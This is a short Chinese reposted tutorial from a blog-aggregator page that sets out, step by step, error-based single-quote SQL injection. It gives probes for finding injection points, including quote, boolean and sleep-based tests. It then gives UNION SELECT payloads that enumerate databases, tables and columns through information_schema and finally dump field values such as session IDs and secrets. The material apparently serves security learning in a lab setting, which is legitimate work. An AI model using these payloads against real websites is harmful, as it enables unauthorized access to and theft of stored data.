sql注入基于错误-单引号-字符型
生活随笔
收集整理的這篇文章主要介紹了
sql注入基于错误-单引号-字符型
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
查找注入點 在url中: 1. ' 2. and 1=1/and 1=2 3. 隨即輸入(整形) 4. -1/+1回顯上下頁面(整形) 5. and sleep(5) (判斷頁面返回時間) 判斷有多少列 order by ..... 爆顯示位: id=88888888') union select 1,2,3 --+ 先獲取數據庫: id=')? union select 1,2,group_concat(distinct+table_schema) from information_schema.columns? --+ 再獲取數據庫的所有表: id=') union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema='庫名' --+ 再獲取表中的字段: id=')? union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name='表名' --+ 再獲取字段信息: id=')? union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 庫名.表名--+
轉載于:https://www.cnblogs.com/sky--/p/5761748.html
總結
以上是生活随笔為你收集整理的sql注入基于错误-单引号-字符型的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 第十一章 AtomicInteger源码
- 下一篇: OpenGL ES入门